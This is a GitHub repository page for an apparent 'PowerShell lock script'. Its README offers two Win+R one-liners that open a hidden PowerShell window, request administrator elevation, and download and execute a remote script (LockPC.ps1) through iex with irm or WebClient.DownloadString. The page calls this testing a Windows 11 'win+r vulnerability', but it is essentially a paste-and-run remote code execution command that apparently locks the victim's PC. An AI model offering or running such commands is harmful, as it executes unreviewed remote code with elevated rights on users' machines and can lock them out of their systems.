Skip to content

UsernameLoxotron/Powershell-Lock-Script

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

10 Commits
 
 
 
 

Repository files navigation

Test win+r vulnerability by running the script from the web

WIN+R --> powershell -WindowStyle Hidden -Command "Start-Process powershell -Verb RunAs -ArgumentList '-WindowStyle Maximized -Command iex(irm ''https://raw.githubusercontent.com/UsernameLoxotron/Powershell-Lock-Script/refs/heads/main/LockPC.ps1'')'" or powershell -WindowStyle Hidden -Command "Start-Process powershell -Verb RunAs -ArgumentList '-WindowStyle Maximized -Command iex(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/UsernameLoxotron/Powershell-Lock-Script/refs/heads/main/LockPC.ps1')"

About

Testing win+r vulnerability in win11

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors